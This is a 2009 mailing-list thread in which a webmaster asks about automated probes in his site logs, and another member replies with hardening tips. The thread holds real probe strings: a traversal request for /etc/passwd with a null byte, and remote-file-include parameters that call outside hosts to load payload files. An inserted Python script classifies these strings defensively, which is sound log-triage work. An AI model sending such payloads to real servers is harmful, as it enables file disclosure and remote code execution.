[dba-Tech] weird website probes

Peter Brawley peter.brawley at earthlink.net
Fri Apr 10 14:20:47 CDT 2009


Hi Jim,

Thanks very much, yes it's on Linux (wouldn't dream of trying to serve a 
website from Winders), it's db-driven, access info is outside the 
document tree, I block known website copiers via .htaccess (but of 
course new ones keep appearing). Most of the hack attempts emanate from 
China, Russia, Mexico & the Czech Republic. Most of the probes are 
automated (too fast to be manual), these sorts of strings appended in a 
very few secs to ten or so existing page urls ...

index.php?var=../../../../../../../../../../../../../../../../etc/passwd%00
out.html
?page=http://kbapt.co.kr/bbs/templates/id1.txt?????
?page=http://mir-linux.ru/lang/idfx1.txt??
?page=http://www.allati-finomsagok.hu/components/com_virtuemart/shop_image/product/resized/thumbnail/id1.txt??
?UL=1&ACT=4&BUILD=6551&STRMVER=4&CAPREQ=0
&qsrc=2870
%20%20/index.php?var=http://www.candidography.com/zero/id1.txt
%20.../werbungFrame.php?do=http://pastebin.com/f448457c2????

Well, the first one is trying to find a password hiding in a GET, lol, 
but the rest are obscure. I was wondering if anyone recognises these probes.

PB
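As an added example that is not part of the thread: a small Python triage script that percent-decodes request URIs like the ones listed above and labels the two shapes the list shows, a directory-traversal value aimed at /etc/passwd with a trailing null byte, and a query parameter whose value is itself a remote URL (the usual shape of a remote-file-include probe against PHP include parameters). The sample requests are constructed from the strings in the message, placed after page paths the way they were appended on the site.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample: the suffixes quoted in the message, each placed after a
# page path the way they were appended to existing URLs on the site.
SAMPLE_REQUESTS = [
    "/index.php?var=../../../../../../../../../../../../../../../../etc/passwd%00",
    "/index.php?page=http://kbapt.co.kr/bbs/templates/id1.txt?????",
    "/index.php?page=http://mir-linux.ru/lang/idfx1.txt??",
    "/php_mysql_win.html%20%20/index.php?var=http://www.candidography.com/zero/id1.txt",
    "/werbungFrame.php?do=http://pastebin.com/f448457c2????",
    "/index.php?UL=1&ACT=4&BUILD=6551&STRMVER=4&CAPREQ=0&qsrc=2870",
    "/about.html",  # benign control request
]

# Patterns checked against each decoded query-string value.
TRAVERSAL = re.compile(r"(\.\./|\.\.\\){2,}")        # repeated ../ or ..\
SENSITIVE_FILE = re.compile(r"/etc/(passwd|shadow)\b", re.I)
REMOTE_URL = re.compile(r"^(https?|ftp)://", re.I)   # value is itself a URL


def classify(request_uri):
    """Return the set of probe labels found in one request path+query.

    parse_qsl percent-decodes each value once, so %00 in the raw log line
    becomes a real NUL byte that the null-byte check can see.
    """
    _path, _sep, query = request_uri.partition("?")
    labels = set()
    for _name, value in parse_qsl(query, keep_blank_values=True):
        if TRAVERSAL.search(value):
            labels.add("path-traversal")
        if SENSITIVE_FILE.search(value):
            labels.add("sensitive-file")
        if "\x00" in value:
            labels.add("null-byte")
        if REMOTE_URL.match(value):
            labels.add("remote-include")
    return labels


def triage(requests):
    """Map each request to its sorted labels; an empty list means nothing matched."""
    return {uri: sorted(classify(uri)) for uri in requests}


if __name__ == "__main__":
    for uri, found in triage(SAMPLE_REQUESTS).items():
        print(f"{found or ['unrecognised']}\t{uri}")
```

Requests that come back unlabelled (the UL/ACT/BUILD string, for instance) are exactly the ones still worth a manual look; the script only separates the well-known shapes from the rest.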

-----

Jim Lawrence wrote:
> Hi Peter:
>
> All sites get probed for weaknesses on the web. That is pretty standard.
> Below is a list of common searches performed by serious hackers looking for
> opportunities:
>
> 1. If any of your directories are readable and have important data that
> information can be gleaned. If you have any important data in a website it
> is open to anyone. There are many open-source or free products like
> 'BackStreetBrowser' (http://www.spadixbd.com/backstreet/) that can copy a
> whole site as fast as the bandwidth will allow. 
> 2. Any directories that are writable can be used to either store temporary
> information or leave time-bombs in hope that you may try and run them...
> some gullible or tired webmasters have even inadvertently spawned zombies on
> their sites that way.
> 3. Some sites that have open FTP (command line) accessible and even password
> protected may find someone running a little loop routine attempting a
> dictionary attack... given that there are usually no limits to how many
> 'tries' the hacker is allowed.
> 4. If you manage your own mail within your website build your mail service
> correctly. Use a Captcha, return email etc... Any web site beyond a Postcard
> site needs a database and a programmed backend for security and management.
> 5. If you do have admin access from your site keep the password long and
> filled with mixed cases, numbers and special characters.
>
> Outside of that you are really pretty safe. 
>
> If you are using IIS, check your logs and see if there is a consistency of
> login attempts: c:<windows directory>/system32/logfiles/*.log and if there
> is you can block the range of IPs through IIS > default SMTP > properties >
> Connection  > add. The site http://whois.domaintools.com/ can be a great
> source for specifics on a hacker's locations. (I have found traditionally
> client's attackers are from China and central Europe.)
>
> You may already know all this but I HTH.
>
> Jim  
>
> -----Original Message-----
> From: dba-tech-bounces at databaseadvisors.com
> [mailto:dba-tech-bounces at databaseadvisors.com] On Behalf Of Peter Brawley
> Sent: Thursday, April 09, 2009 8:36 PM
> To: Discussion of Hardware and Software issues
> Subject: [dba-Tech] weird website probes
>
> I've taken to studying NotFound/Unauthorised errors at our site. We get 
> hundreds of weird probes a day, mostly in bursts, eg just a few minutes 
> ago we got about a dozen of these in a few seconds:
>
> www.artfulsoftware.com/php_mysql_win.html%20%20/index.php?var=http://www.candidography.com/zero/id1.txt??
>
> www.artfulsoftware.com/php_mysql_win.html is a real page. The rest looks 
> like a probe of some sort. A probe for what? GET-based vulnerabilities?  
> Anybody have an idea what such vandals might be trying to accomplish?
>
> PB
>
>
>
>
> _______________________________________________
> dba-Tech mailing list
> dba-Tech at databaseadvisors.com
> http://databaseadvisors.com/mailman/listinfo/dba-tech
> Website: http://www.databaseadvisors.com
>
